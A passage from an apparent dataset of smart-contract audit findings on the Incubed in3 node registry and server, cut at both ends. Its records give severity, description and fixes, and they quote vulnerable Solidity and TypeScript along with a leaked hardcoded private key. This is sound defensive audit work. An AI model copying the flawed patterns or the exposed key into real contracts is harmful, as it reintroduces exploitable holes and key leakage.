'2.0', method: 'in3\\_sign', params: blocksToRequest })\\n : { result: [] }) as RPCResponse\\n if (response.error) {\\n```\\n -in3-server - key management PendingчhighчSecure and efficient key management is a challenge for any cryptographic system. Incubed nodes for example require an account on the ethereum blockchain to actively participate in the incubed network. 
The account and therefore a private-key is used to sign transactions on the ethereum blockchain and to provide signed proofs to other in3-nodes.\\nThis means that an attacker that is able to discover the keys used by an `in3-server` by any mechanism may be able to impersonate that node, steal the node's funds or sign wrong data on behalf of the node which might also lead to a loss of funds.\\nThe private key for the `in3-server` can be specified in a configuration file called `config.json` residing in the program working dir. Settings from the `config.json` can be overridden via command-line options. The application keeps configuration parameters available internally in an `IN3RPCConfig` object and passes this object as an initialization parameter to other objects.\\nThe key can either be provided in plaintext as a hex-string starting with `0x` or within an ethereum keystore format compatible protected keystore file. Either way it is provided it will be held in plaintext in the object.\\nThe application accepts plaintext private keys and the keys are stored unprotected in the application's memory in JavaScript objects. The `in3-server` might even re-use the node's private key which may weaken the security provided by the node. The repository leaks a series of presumably ‘test private keys' and the default config file already comes with a private key set that might be shared across unwary users that fail to override it.\\ncode/in3-server/config.json:L1-L4\\n```\\n{\\n \"privateKey\": \"0xc858a0f49ce12df65031ba0eb0b353abc74f93f8ccd43df9682fd2e2293a4db3\",\\n \"rpcUrl\": \"http://rpc-kovan.slock.it\"\\n}\\n```\\n\\ncode/in3-server/package.json:L20-L31\\nThe private key is also passed as arguments to other functions. In error cases these may leak the private key to log interfaces or remote log aggregation instances (sentry).
See `txargs.privateKey` in the example below:\\ncode/in3-server/src/util/tx.ts:L100-L100\\n```\\nconst key = toBuffer(txargs.privateKey)\\n```\\n\\ncode/in3-server/src/util/tx.ts:L134-L140\\n```\\nconst txHash = await transport.handle(url, {\\n jsonrpc: '2.0',\\n id: idCount++,\\n method: 'eth\\_sendRawTransaction',\\n params: [toHex(tx.serialize())]\\n}).then((\\_: RPCResponse) => \\_.error ? Promise.reject(new SentryError('Error sending tx', 'tx\\_error', 'Error sending the tx ' + JSON.stringify(txargs) + ':' + JSON.stringify(\\_.error))) as any : \\_.result + '')\\n```\\nчResolution\\nThe breakdown of the fixes addressed with git.slock.it/PR/13 are as follows:\\nKeys should never be stored or accepted in plaintext format Keys should only be accepted in an encrypted and protected format\\nThe private key in `code/in3-server/config.json` has been removed. The repository still contains private keys at least in the following locations:\\n`package.json`\\n`vscode/launch.json`\\n`example_docker-compose.yml`\\nNote that private keys indexed by a git repository can be restored from the repository history.\\nThe following statement has been provided to address this issue:\\nWe have removed all examples and usage of plain private keys and replaced them with json-keystore files. Also in the documentation we added warnings on how to deal with keys, especially with hints to the bash history or environment\\n\\nA single key should be used for only one purpose. Keys should not be shared.\\nThe following statement has been provided to address this issue:\\nThis is why we separated the owner and signer-key. This way you can use a multisig to securely protect the owner-key.
The signer-key is used to sign blocks (and convict) and is not able to do anything else (not even changing its own url)\\n\\nThe application should support developers in understanding where cryptographic keys are stored within the application as well as in which memory regions they might be accessible for other applications\\nAddressed by wrapping the private key in an object that stores the key in encrypted form and only decrypts it when signing. The key is cleared after usage. The IN3-server still allows raw private keys to be configured. A warning is printed if that is the case. The loaded raw private key is temporarily assigned to a local variable and not explicitly cleared by the method.\\nWhile we used to keep the unlocked key as part of the config, we have now removed the key from the config and store them in a special signer-function.\\nhttps://git.slock.it/in3/ts/in3-server/merge_requests/113\\n\\nKeys should be protected in memory and only decrypted for the duration of time they are actively used. Keys should not be stored with the applications source-code repository\\nsee previous remediation note.\\nAfter unlocking the signer key, we encrypt it again and keep it encrypted only decrypting it when signing. This way the raw private key only exist for a very short time in memory and will be filled with 0 right after. ( https://git.slock.it/in3/ts/in3-server/merge_requests/113/diffs#653b04fa41e35b55181776b9f14620b661cff64c_54_73 )\\n\\nUse standard libraries for cryptographic operations\\nThe following statement has been provided to address this issue\\nWe are using ethereumjs-libs.\\n\\nUse the system keystore and API to sign and avoid to store key material at all\\nThe following statement has been provided to address this issue\\nWe are looking into using different signer-apis, even supporting hardware-modules like HSMs. 
But this may happen in future releases.\\n\\nThe application should store the keys eth-address (util.getAddress()) instead of re-calculating it multiple times from the private key.\\nFixed by generating the address for a private key once and storing it in a private key wrapper object.\\n\\nDo not leak credentials and key material in debug-mode, to local log-output or external log aggregators.\\n`txArgs` still contains a field `privateKey` as outlined in the issue description. However, this `privateKey` now represents the wrapper object noted in a previous comment which only provides access to the ETH address generated from the raw private key.\\nThe following statement has been provided to address this issue:\\nsince the private key and the passphrase are actually deleted from the config, logoutputs or even debug will not be able to leak this information.\\nKeys should never be stored or accepted in plaintext format.\\nKeys should not be stored in plaintext on the file-system as they might easily be exposed to other users. Credentials on the file-system must be tightly restricted by access control.\\nKeys should not be provided as plaintext via environment variables as this might make them available to other processes sharing the same environment (child-processes, e.g. same shell session)\\nKeys should not be provided as plaintext via command-line arguments as they might persist in the shell's command history or might be available to privileged system accounts that can query other processes startup parameters.\\nKeys should only be accepted in an encrypted and protected format.\\nA single key should be used for only one purpose. 
Keys should not be shared.\\nThe use of the same key for two different cryptographic processes may weaken the security provided by one or both of the processes.\\nThe use of the same key for two different applications may weaken the security provided by one or both of the applications.\\nLimiting the use of a key limits the damage that could be done if the key is compromised.\\nNode owners keys should not be re-used as signer keys.\\nThe application should support developers in understanding where cryptographic keys are stored within the application as well as in which memory regions they might be accessible for other applications.\\nKeys should be protected in memory and only decrypted for the duration of time they are actively used.\\nKeys should not be stored with the applications source-code repository.\\nUse standard libraries for cryptographic operations.\\nUse the system keystore and API to sign and avoid to store key material at all.\\nThe application should store the keys eth-address (util.getAddress()) instead of re-calculating it multiple times from the private key.\\nDo not leak credentials and key material in debug-mode, to local log-output or external log aggregators.чч```\\n{\\n \"privateKey\": \"0xc858a0f49ce12df65031ba0eb0b353abc74f93f8ccd43df9682fd2e2293a4db3\",\\n \"rpcUrl\": \"http://rpc-kovan.slock.it\"\\n}\\n```\\n -NodeRegistry - Multiple nodes can share slightly different RPC URLчhighчOne of the requirements for Node registration is to have a unique URL which is not already used by a different owner. The uniqueness check is done by hashing the provided `_url` and checking if someone already registered with that hash of `_url`.\\nHowever, byte-equality checks (via hashing in this case) to enforce uniqueness will not work for URLs. 
For example, while the following URLs are not equal and will result in different `urlHashes` they can logically be the same end-point:\\n`https://some-server.com/in3-rpc`\\n`https://some-server.com:443/in3-rpc`\\n`https://some-server.com/in3-rpc/`\\n`https://some-server.com/in3-rpc///`\\n`https://some-server.com/in3-rpc?something`\\n`https://some-server.com/in3-rpc?something&something`\\n`https://www.some-server.com/in3-rpc?something` (if www resolves to the same ip)\\n```\\nbytes32 urlHash = keccak256(bytes(\\_url));\\n\\n// make sure this url and also this owner was not registered before.\\n// solium-disable-next-line\\nrequire(!urlIndex[urlHash].used && signerIndex[\\_signer].stage == Stages.NotInUse,\\n \"a node with the same url or signer is already registered\");\\n```\\n\\nThis leads to the following attack vectors:\\nA user signs up multiple nodes that resolve to the same end-point (URL). A minimum deposit of `0.01 ether` is required for each registration. Registering multiple nodes for the same end-point might allow an attacker to increase their chance of being picked to provide proofs. Registering multiple nodes requires unique `signer` addresses per node.\\nAlso one node can have multiple accounts, hence one node can have slightly different URL and different accounts as the signers.\\nDoS - A user might register nodes for URLs that do not serve in3-clients in an attempt to DDoS e.g. in an attempt to extort web-site operators. This is kind of a reflection attack where nodes will request other nodes from the contract and try to contact them over RPC. Since it is http-rpc it will consume resources on the receiving end.\\nDoS - A user might register Nodes with RPC URLs of other nodes, manipulating weights to cause more traffic than the node can actually handle. Nodes will try to communicate with that node. If no proof is requested the node will not even know that someone else signed up other nodes with their RPC URL to cause problems. 
If they request proof the original `signer` will return a signed proof and the node will fail due to a signature mismatch. However, the node cannot be convicted and therefore forced to lose the deposit as conviction is bound to the `signer` and the block was not signed by the rogue node entry. There will be no way to remove the node from the registry other than the admin functionality.чCanonicalize URLs, but that will not completely prevent someone from registering nodes for other end-points or websites. Nodes can be removed by an admin in the first year but not after that. Rogue owners cannot be prevented from registering random nodes with high weights and minimum deposit. They cannot be convicted as they do not serve proofs. Rogue owners can still unregister to receive their deposit after messing with the system.чч```\\nbytes32 urlHash = keccak256(bytes(\\_url));\\n\\n// make sure this url and also this owner was not registered before.\\n// solium-disable-next-line\\nrequire(!urlIndex[urlHash].used && signerIndex[\\_signer].stage == Stages.NotInUse,\\n \"a node with the same url or signer is already registered\");\\n```\\n -Impossible to remove malicious nodes after the initial periodчmediumчThe system has a centralized power structure for the first year after deployment.
An `unregisterKey` (creator of the contract) is allowed to remove Nodes that are in state `Stages.Active` from the registry, only in 1st year.\\nHowever, there is no possibility to remove malicious nodes from the registry after that.\\n```\\n/// @dev only callable in the 1st year after deployment\\nfunction removeNodeFromRegistry(address \\_signer)\\n external\\n onlyActiveState(\\_signer)\\n{\\n\\n // solium-disable-next-line security/no-block-members\\n require(block.timestamp < (blockTimeStampDeployment + YEAR\\_DEFINITION), \"only in 1st year\");// solhint-disable-line not-rely-on-time\\n require(msg.sender == unregisterKey, \"only unregisterKey is allowed to remove nodes\");\\n\\n SignerInformation storage si = signerIndex[\\_signer];\\n In3Node memory n = nodes[si.index];\\n\\n unregisterNodeInternal(si, n);\\n\\n}\\n```\\nчResolution\\nThis issue has been addressed with a large change-set that splits the NodeRegistry into two contracts, which results in a code flow that mitigates this issue by making the logic contract upgradable (after 47 days of notice). The resolution adds more complexity to the system, and this complexity is not covered by the original audit. Splitting up the contracts has the side-effect of events being emitted by two different contracts, requiring nodes to subscribe to both contracts' events.\\nThe need for removing malicious nodes from the registry, arises from the design decision to allow anyone to register any URL. These URLs might not actually belong to the registrar of the URL and might not be IN3 nodes. This is partially mitigated by a centralization feature introduced in the mitigation phase that implements whitelist functionality for adding nodes.\\nWe generally advocate against adding complexity, centralization and upgrading mechanisms that can allow one party to misuse functionalities of the contract system for their benefit (e.g. 
`adminSetNodeDeposit` is only used to reset the deposit but allows the Logic contract to set any deposit; the logic contract is set by the owner and there is a 47 day timelock).\\nWe believe the solution to this issue, should have not been this complex. The trust model of the system is changed with this solution, now the logic contract can allow the admin a wide range of control over the system state and data.\\nThe following statement has been provided with the change-set:\\nDuring the 1st year, we will keep the current mechanic even though it's a centralized approach. However, we changed the structure of the smart contracts and separated the NodeRegistry into two different smart contracts: NodeRegistryLogic and NodeRegistryData. After a successful deployment only the NodeRegistryLogic-contract is able to write data into the NodeRegistryData-contract. This way, we can keep the stored data (e.g. the nodeList) in the NodeRegistryData-contract while changing the way the data gets added/updated/removed is handled in the NodeRegistryLogic-contract. We also provided a function to update the NodeRegistryLogic-contract, so that we are able to change to a better solution for removing nodes in an updated contract.\\nProvide a solution for the network to remove fraudulent node entries. 
This could be done by voting mechanism (with staking, etc).чч```\\n/// @dev only callable in the 1st year after deployment\\nfunction removeNodeFromRegistry(address \\_signer)\\n external\\n onlyActiveState(\\_signer)\\n{\\n\\n // solium-disable-next-line security/no-block-members\\n require(block.timestamp < (blockTimeStampDeployment + YEAR\\_DEFINITION), \"only in 1st year\");// solhint-disable-line not-rely-on-time\\n require(msg.sender == unregisterKey, \"only unregisterKey is allowed to remove nodes\");\\n\\n SignerInformation storage si = signerIndex[\\_signer];\\n In3Node memory n = nodes[si.index];\\n\\n unregisterNodeInternal(si, n);\\n\\n}\\n```\\n -NodeRegistry.registerNodeFor() no replay protection and expiration Won't FixчmediumчAn owner can register a node with the signer not being the owner by calling `registerNodeFor`. The owner submits a message signed for the owner including the properties of the node including the url.\\nThe signed data does not include the `registryID` nor the NodeRegistry's address and can therefore be used by the owner to submit the same node to multiple registries or chains without the signers consent.\\nThe signed data does not expire and can be re-used by the owner indefinitely to submit the same node again to future contracts or the same contract after the node has been removed.\\nArguments are not validated in the external function (also see issue 6.17)\\n```\\nbytes32 tempHash = keccak256(\\n abi.encodePacked(\\n \\_url,\\n \\_props,\\n \\_timeout,\\n \\_weight,\\n msg.sender\\n )\\n);\\n```\\nчInclude `registryID` and an expiration timestamp that is checked in the contract with the signed data. 
Validate function arguments.чч```\\nbytes32 tempHash = keccak256(\\n abi.encodePacked(\\n \\_url,\\n \\_props,\\n \\_timeout,\\n \\_weight,\\n msg.sender\\n )\\n);\\n```\\n -BlockhashRegistry - Structure of provided blockheaders should be validatedчmediumч`getParentAndBlockhash` takes an rlp-encoded blockheader blob, extracts the parent parent hash and returns both the parent hash and the calculated blockhash of the provided data. The method is used to add blockhashes to the registry that are older than 256 blocks as they are not available to the evm directly. This is done by establishing a trust-chain from a blockhash that is already in the registry up to an older block\\nThe method assumes that valid rlp encoded data is provided but the structure is not verified (rlp decodes completely; block number is correct; timestamp is younger than prevs, …), giving a wide range of freedom to an attacker with enough hashing power (or exploiting potential future issues with keccak) to forge blocks that would never be accepted by clients, but may be accepted by this smart contract. (threat: mining pool forging arbitrary non-conformant blocks to exploit the BlockhashRegistry)\\nIt is not checked that input was actually provided. However, accessing an array at an invalid index will raise an exception in the EVM. Providing a single byte > `0xf7` will yield a result and succeed even though it would have never been accepted by a real node.\\nIt is assumed that the first byte is the rlp encoded length byte and an offset into the provided `_blockheader` bytes-array is calculated. Memory is subsequently accessed via a low-level `mload` at this calculated offset. However, it is never validated that the offset actually lies within the provided range of bytes `_blockheader` leading to an out-of-bounds memory read access.\\nThe rlp encoded data is only partially decoded. For the first rlp list the number of length bytes is extracted. 
For the rlp encoded long string a length byte of 1 is assumed. The inline comment appears to be inaccurate or might be misleading. `// we also have to add \"2\" = 1 byte to it to skip the length-information`\\nInvalid intermediary blocks (e.g. with parent hash 0x00) will be accepted potentially allowing an attacker to optimize the effort needed to forge invalid blocks skipping to the desired blocknumber overwriting a certain blockhash (see issue 6.18)\\nWith one collision (very unlikely) an attacker can add arbitrary or even random values to the BlockchainRegistry. The parent-hash of the starting blockheader cannot be verified by the contract ([target_block_random]<--parent_hash--[rnd]<--parent_hash--[rnd]<--parent_hash--...<--parent_hash--[collision]<--parent_hash_collision--[anchor_block]). While nodes can verify block structure and bail on invalid structure and check the first block's hash and make sure the chain is intact the contract can't. Therefore one cannot assume the same trust in the blockchain registry when recreating blocks compared to running a full node.\\n```\\nfunction getParentAndBlockhash(bytes memory \\_blockheader) public pure returns (bytes32 parentHash, bytes32 bhash) {\\n\\n /// we need the 1st byte of the blockheader to calculate the position of the parentHash\\n uint8 first = uint8(\\_blockheader[0]);\\n\\n /// calculates the offset\\n /// by using the 1st byte (usually f9) and substracting f7 to get the start point of the parentHash information\\n /// we also have to add \"2\" = 1 byte to it to skip the length-information\\n require(first > 0xf7, \"invalid offset\");\\n uint8 offset = first - 0xf7 + 2;\\n\\n /// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n // solium-disable-next-line security/no-inline-assembly\\n assembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, 
\\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n }\\n bhash = keccak256(\\_blockheader);\\n```\\nчValidate that the provided data is within a sane range of bytes that is expected (min/max blockheader sizes).\\nValidate that the provided data is actually an rlp encoded blockheader.\\nValidate that the offset for the parent Hash is within the provided data.\\nValidate that the parent Hash is non zero.\\nValidate that blockhashes do not repeat.чч```\\nfunction getParentAndBlockhash(bytes memory \\_blockheader) public pure returns (bytes32 parentHash, bytes32 bhash) {\\n\\n /// we need the 1st byte of the blockheader to calculate the position of the parentHash\\n uint8 first = uint8(\\_blockheader[0]);\\n\\n /// calculates the offset\\n /// by using the 1st byte (usually f9) and substracting f7 to get the start point of the parentHash information\\n /// we also have to add \"2\" = 1 byte to it to skip the length-information\\n require(first > 0xf7, \"invalid offset\");\\n uint8 offset = first - 0xf7 + 2;\\n\\n /// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n // solium-disable-next-line security/no-inline-assembly\\n assembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n }\\n bhash = keccak256(\\_blockheader);\\n```\\n -Registries - Incomplete input validation and 
inconsistent order of validations PendingчmediumчMethods and Functions usually live in one of two worlds:\\n`public` API - methods declared with visibility `public` or `external` exposed for interaction by other parties\\n`internal` API - methods declared with visibility `internal`, `private` that are not exposed for interaction by other parties\\nWhile it is good practice to visually distinguish internal from public API by following commonly accepted naming convention e.g. by prefixing internal functions with an underscore (_doSomething vs. doSomething) or adding the keyword `unsafe` to `unsafe` functions that are not performing checks and may have a dramatic effect to the system (_unsafePayout vs. RequestPayout), it is important to properly verify that inputs to methods are within expected ranges for the implementation.\\nInput validation checks should be explicit and well documented as part of the code's documentation. This is to make sure that smart-contracts are robust against erroneous inputs and reduce the potential attack surface for exploitation.\\nIt is good practice to verify the methods input as early as possible and only perform further actions if the validation succeeds. 
Methods can be split into an external or public API that performs initial checks and subsequently calls an internal method that performs the action.\\nThe following lists some public API methods that are not properly checking the provided data:\\n`BlockhashRegistry.reCalculateBlockheaders` - bhash can be zero; blockheaders can be empty\\nBlockhashRegistry.getParentAndBlockhash- blockheader structure can be random as long as parenthash can be extracted\\n`BlockhashRegistry.recreateBlockheaders` - blockheaders can be empty; Arguments should be validated before calculating values that depend on them:\\n```\\nassert(\\_blockNumber > \\_blockheaders.length);\\n```\\n\\n`BlockhashRegistry.searchForAvailableBlock` - `_startNumber + _numBlocks` can be > `block.number; _startNumber + _numBlocks` can overflow.\\n`NodeRegistry.removeNode` - should check `require(_nodeIndex < nodes.length)` first before any other action.\\n```\\nfunction removeNode(uint \\_nodeIndex) internal {\\n // trigger event\\n emit LogNodeRemoved(nodes[\\_nodeIndex].url, nodes[\\_nodeIndex].signer);\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(nodes[\\_nodeIndex].url))];\\n uint length = nodes.length;\\n\\n assert(length > 0);\\n```\\n\\n`NodeRegistry.registerNodeFor` - Signature version `v` should be checked to be either `27 || 28` before verifying it.\\n```\\nfunction registerNodeFor(\\n string calldata \\_url,\\n uint64 \\_props,\\n uint64 \\_timeout,\\n address \\_signer,\\n uint64 \\_weight,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n)\\n external\\n payable\\n{\\n```\\n\\n`NodeRegistry.revealConvict` - unchecked `signer`\\n```\\nSignerInformation storage si = signerIndex[\\_signer];\\n```\\n\\n`NodeRegistry.revealConvict` - signer status can be checked earlier.\\n```\\nrequire(si.stage != Stages.Convicted, \"node already convicted\");\\n```\\n\\n`NodeRegistry.updateNode` - the check if the `newURL` is registered can be done earlier\\n```\\nrequire(!urlIndex[newURl].used, 
\"url is already in use\");\\n```\\nчUse Checks-Effects-Interactions pattern for all functions.чч```\\nassert(\\_blockNumber > \\_blockheaders.length);\\n```\\n -BlockhashRegistry - recreateBlockheaders allows invalid parent hashes for intermediary blocksчmediumчIt is assumed that a blockhash of `0x00` is invalid, but the method accepts intermediary parent hashes extracted from blockheaders that are zero when establishing the trust chain.\\n`recreateBlockheaders` relies on `reCalculateBlockheaders` to correctly establish a chain of trust from the provided list of `_blockheaders` to a valid blockhash stored in the contract. However, `reCalculateBlockheaders` fails to raise an exception in case `getParentAndBlockhash` returns a blockhash of `0x00`. Subsequently it will skip over invalid blockhashes and continue to establish the trust chain without raising an error.\\nThis may allow an attacker with enough hashing power to store a blockheader hash that is actually invalid on the real chain but accepted within this smart contract. 
This may even only be done temporarily to overwrite an existing hash for a short period of time (see https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/24).\\n```\\nfor (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n}\\n```\\nчStop processing the array of `_blockheaders` immediately if a blockheader is invalid.чч```\\nfor (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n}\\n```\\n -BlockhashRegistry - recreateBlockheaders succeeds and emits an event even though no blockheaders have been providedчmediumчThe method is used to re-create blockhashes from a list of rlp-encoded `_blockheaders`. However, the method never checks if `_blockheaders` actually contains items. 
The result is, that the method will unnecessarily store the same value that is already in the `blockhashMapping` at the same location and wrongly log `LogBlockhashAdded` even though nothing has been added nor changed.\\nassume `_blockheaders` is empty and the registry already knows the blockhash of `_blockNumber`\\n```\\nfunction recreateBlockheaders(uint \\_blockNumber, bytes[] memory \\_blockheaders) public {\\n\\n bytes32 currentBlockhash = blockhashMapping[\\_blockNumber];\\n require(currentBlockhash != 0x0, \"parentBlock is not available\");\\n\\n bytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n require(calculatedHash != 0x0, \"invalid headers\");\\n```\\n\\nAn attempt is made to re-calculate the hash of an empty `_blockheaders` array (also passing the `currentBlockhash` from the registry)\\n```\\nbytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n```\\n\\nThe following loop in `reCalculateBlockheaders` is skipped and the `currentBlockhash` is returned.\\n```\\nfunction reCalculateBlockheaders(bytes[] memory \\_blockheaders, bytes32 \\_bHash) public pure returns (bytes32 bhash) {\\n\\n bytes32 currentBlockhash = \\_bHash;\\n bytes32 calcParent = 0x0;\\n bytes32 calcBlockhash = 0x0;\\n\\n /// save to use for up to 200 blocks, exponential increase of gas-usage afterwards\\n for (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n }\\n\\n return currentBlockhash;\\n```\\n\\nThe assertion does not fire, the `bnr` to store the `calculatedHash` is the same as the one initially provided to the method as an argument.. 
Nothing has changed but an event is emitted.\\n```\\n /// we should never fail this assert, as this would mean that we were able to recreate a invalid blockchain\\n assert(\\_blockNumber > \\_blockheaders.length);\\n uint bnr = \\_blockNumber - \\_blockheaders.length;\\n blockhashMapping[bnr] = calculatedHash;\\n emit LogBlockhashAdded(bnr, calculatedHash);\\n}\\n```\\nчThe method is crucial for the system to work correctly and must be tightly controlled by input validation. It should not be allowed to overwrite an existing value in the contract (issue 6.29) or emit an event even though nothing has happened. Therefore validate that user provided input is within safe bounds. In this case, that at least one `_blockheader` has been provided. Validate that `_blockNumber` is less than `block.number` and do not expect that parts of the code will throw and safe the contract from exploitation.чч```\\nfunction recreateBlockheaders(uint \\_blockNumber, bytes[] memory \\_blockheaders) public {\\n\\n bytes32 currentBlockhash = blockhashMapping[\\_blockNumber];\\n require(currentBlockhash != 0x0, \"parentBlock is not available\");\\n\\n bytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n require(calculatedHash != 0x0, \"invalid headers\");\\n```\\n -NodeRegistry.updateNode replaces signer with owner and emits inconsistent eventsчmediumчWhen the `owner` calls `updateNode()` function providing a new `url` for the node, the `signer` of the `url` is replaced by `msg.sender` which in this case is the `owner` of the node. 
Note that new URL can resolve to the same URL as before (See https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/36).\\n```\\nif (newURl != keccak256(bytes(node.url))) {\\n\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(node.url))];\\n\\n // make sure the new url is not already in use\\n require(!urlIndex[newURl].used, \"url is already in use\");\\n\\n UrlInformation memory ui;\\n ui.used = true;\\n ui.signer = msg.sender;\\n urlIndex[newURl] = ui;\\n node.url = \\_url;\\n}\\n```\\n\\nFurthermore, the method emits a `LogNodeRegistered` event when the node structure is updated. However, the event will always emit `msg.sender` as the signer even though that might not be true. For example, if the `url` does not change, the signer can still be another account that was previously registered with `registerNodeFor` and is not necessarily the `owner`.\\n```\\nemit LogNodeRegistered(\\n node.url,\\n \\_props,\\n msg.sender,\\n node.deposit\\n);\\n```\\n\\n```\\nevent LogNodeRegistered(string url, uint props, address signer, uint deposit);\\n```\\nчThe `updateNode()` function gets the `signer` as an input used to reference the node structure and this `signer` should be set for the `UrlInformation`.\\n```\\nfunction updateNode(\\n address \\_signer,\\n string calldata \\_url,\\n uint64 \\_props,\\n uint64 \\_timeout,\\n uint64 \\_weight\\n )\\n```\\n\\nThe method should actually only allow to change node properties when `owner==signer` otherwise `updateNode` is bypassing the strict requirements enforced with `registerNodeFor` where e.g. the `url` needs to be signed by the signer in order to register it.\\nThe emitted event should always emit `node.signer` instead of `msg.sender` which can be wrong.\\nThe method should emit its own distinct event `LogNodeUpdated` for audit purposes and to be able to distinguish new node registrations from node structure updates. 
This might also require software changes to client/node implementations to listen for node updates.чч```\\nif (newURl != keccak256(bytes(node.url))) {\\n\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(node.url))];\\n\\n // make sure the new url is not already in use\\n require(!urlIndex[newURl].used, \"url is already in use\");\\n\\n UrlInformation memory ui;\\n ui.used = true;\\n ui.signer = msg.sender;\\n urlIndex[newURl] = ui;\\n node.url = \\_url;\\n}\\n```\\n -NodeRegistry - In3Node memory n is never usedчlowчNodeRegistry `In3Node memory n` is never used inside the modifier `onlyActiveState`.\\n```\\nmodifier onlyActiveState(address \\_signer) {\\n\\n SignerInformation memory si = signerIndex[\\_signer];\\n require(si.stage == Stages.Active, \"address is not an in3-signer\");\\n\\n In3Node memory n = nodes[si.index];\\n assert(nodes[si.index].signer == \\_signer);\\n \\_;\\n}\\n```\\nчUse `n` in the assertion to access the node signer `assert(n.signer == _signer);` or directly access it from storage and avoid copying the struct.чч```\\nmodifier onlyActiveState(address \\_signer) {\\n\\n SignerInformation memory si = signerIndex[\\_signer];\\n require(si.stage == Stages.Active, \"address is not an in3-signer\");\\n\\n In3Node memory n = nodes[si.index];\\n assert(nodes[si.index].signer == \\_signer);\\n \\_;\\n}\\n```\\n -NodeRegistry - removeNode unnecessarily casts the nodeIndex to uint64 potentially truncating its valueчlowч`removeNode` removes a node from the Nodes array. This is done by copying the last node of the array to the `_nodeIndex` of the node that is to be removed. Finally the node array size is decreased.\\nA Node's index is also referenced in the `SignerInformation` struct. This index needs to be adjusted when removing a node from the array as the last node is copied to the index of the node that is to be removed.\\nWhen adjusting the Node's index in the `SignerInformation` struct `removeNode` casts the index to `uint64`. 
This is both unnecessary as the struct defines the index as `uint` and theoretically dangerous if a node at an index greater than `uint64_max` is removed. The resulting `SignerInformation` index will be truncated to `uint64` leading to an inconsistency in the contract.\\n```\\nstruct SignerInformation {\\n uint64 lockedTime; /// timestamp until the deposit of an in3-node can not be withdrawn after the node was removed\\n address owner; /// the owner of the node\\n\\n Stages stage; /// state of the address\\n\\n uint depositAmount; /// amount of deposit to be locked, used only after a node had been removed\\n\\n uint index; /// current index-position of the node in the node-array\\n}\\n```\\n\\n```\\n// move the last entry to the removed one.\\nIn3Node memory m = nodes[length - 1];\\nnodes[\\_nodeIndex] = m;\\n\\nSignerInformation storage si = signerIndex[m.signer];\\nsi.index = uint64(\\_nodeIndex);\\nnodes.length--;\\n```\\nчResolution\\nFixed as per recommendation https://git.slock.it/in3/in3-contracts/commit/6c35dd422e27eec1b1d2f70e328268014cadb515.\\nDo not cast and therefore truncate the index.чч```\\nstruct SignerInformation {\\n uint64 lockedTime; /// timestamp until the deposit of an in3-node can not be withdrawn after the node was removed\\n address owner; /// the owner of the node\\n\\n Stages stage; /// state of the address\\n\\n uint depositAmount; /// amount of deposit to be locked, used only after a node had been removed\\n\\n uint index; /// current index-position of the node in the node-array\\n}\\n```\\n -BlockhashRegistry- assembly code can be optimizedчlowчThe following code can be optimized by removing `mload` and mstore:\\n```\\nrequire(first > 0xf7, \"invalid offset\");\\nuint8 offset = first - 0xf7 + 2;\\n\\n/// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n// solium-disable-next-line security/no-inline-assembly\\nassembly { // solhint-disable-line 
no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n}\\n```\\nч```\\nassembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n //mstore(0x20, \\_blockheader) //@audit should assign 0x20ptr to variable first and use it.\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n \\_blockheader, 0x20\\n ), offset)\\n )\\n }\\n```\\nчч```\\nrequire(first > 0xf7, \"invalid offset\");\\nuint8 offset = first - 0xf7 + 2;\\n\\n/// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n// solium-disable-next-line security/no-inline-assembly\\nassembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n 